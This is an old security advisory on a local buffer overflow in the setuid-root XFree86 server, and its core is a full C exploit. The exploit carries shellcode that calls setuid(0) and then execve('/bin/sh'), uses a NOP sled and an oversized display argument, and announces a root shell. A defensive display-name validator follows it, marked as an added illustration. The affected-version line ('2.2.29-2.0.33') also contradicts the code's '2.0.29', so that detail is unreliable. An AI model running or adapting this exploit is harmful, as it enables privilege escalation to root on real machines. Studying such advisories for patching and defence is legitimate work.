COMMAND

    X (XFree Server)

SYSTEMS AFFECTED

    Linux (Slackware?) 2.2.29-2.0.33 (at least)

PROBLEM

    Thanks to Dejan Dinic for sending me this one. It is a buffer
    overflow exploit in the XFree86 server (the X server is installed
    setuid root, so the overflow yields a root shell). Exploit follows:

    /*  XFree86 Server exploit for Intel x86
        Tested on Linux 2.0.29 & 2.0.33 */

    /* Try 2 3 4 5 for OFFSET */

    #define OFFSET 2

    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <errno.h>

    #define LENCODE ( sizeof( Code ) )
    /* Shellcode: dup2() fds 10-12 back onto 0-2, setuid(0), setgid(0),
       then execve("/bin/sh"). */
    char Code[] =
        "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
        "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
        "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
        "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
        "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";

    /* The overlong display argument (":99999" + 0x4000 bytes) is what
       overflows the server's fixed-size buffer. */
    char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
    char *args[] = { "X", "-nolock", Display, NULL };

    int main(void) {
      printf("You have now RooT shell");
      /* Keep copies of stdin/stdout/stderr where the shellcode expects them. */
      dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
      /* Guess the return address as esp minus a constant, store it at ptr. */
      __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
      memcpy( ptr + 4, ptr, 0x3fc );                 /* repeat the address  */
      memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE ); /* NOP sled            */
      memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );/* shellcode at the end */
      /* args + 3 points at the NULL entry, i.e. an empty environment. */
      execve( "/usr/X11R6/bin/X", args, args + 3 );
      perror( "execve" );
      return 1;
    }
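    The argument the exploit abuses is the display name, so the server-side
    fix is to bounds-check that argument before it is copied into any
    fixed-size buffer. The following is an added illustration, not code from
    the advisory or from XFree86; the buffer size DISPLAY_MAX and the helper
    names are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define DISPLAY_MAX 64   /* assumed capacity of the server's display buffer */

/* Accepts ":<display>[.<screen>]" where both parts are decimal digits and
 * the whole string, including the terminating NUL, fits in outlen bytes.
 * Copies into out and returns 1 on success; returns 0 and leaves out
 * empty otherwise. The length is checked before a single byte is copied. */
int parse_display(const char *arg, char *out, size_t outlen)
{
    size_t len, i;
    int seen_dot = 0, digits = 0;

    if (out == NULL || outlen == 0) return 0;
    out[0] = '\0';
    if (arg == NULL) return 0;

    /* Bound the scan itself: an argument longer than the buffer is rejected
     * without ever reading more than outlen bytes of it. */
    for (len = 0; len < outlen && arg[len] != '\0'; len++) ;
    if (len >= outlen || len < 2 || arg[0] != ':') return 0;

    for (i = 1; i < len; i++) {
        if (isdigit((unsigned char)arg[i])) { digits++; continue; }
        if (arg[i] == '.' && !seen_dot && digits > 0) {
            seen_dot = 1; digits = 0; continue;
        }
        return 0;                 /* any other character */
    }
    if (digits == 0) return 0;    /* ":" alone or a trailing "." */

    memcpy(out, arg, len + 1);
    return 1;
}

/* Convenience wrapper: validate into a local buffer, return the verdict. */
int display_ok(const char *arg)
{
    char out[DISPLAY_MAX];
    return parse_display(out == NULL ? NULL : arg, out, sizeof out);
}

/* Constructed input shaped like the advisory's argument: ":99999" followed by
 * padding well past any fixed buffer. Returns 1 if the check refuses it. */
int rejects_oversized_display(void)
{
    static char big[0x4001 + 2];
    memset(big, 'A', sizeof big - 1);
    memcpy(big, ":99999", 6);
    big[sizeof big - 1] = '\0';
    return display_ok(big) == 0;
}
```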

SOLUTION

    A lot has been said about the setuid XFree86 server by now, so I
    advise you to follow the earlier advisories regarding it and the
    XFree86 page, where you will find the most up-to-date information.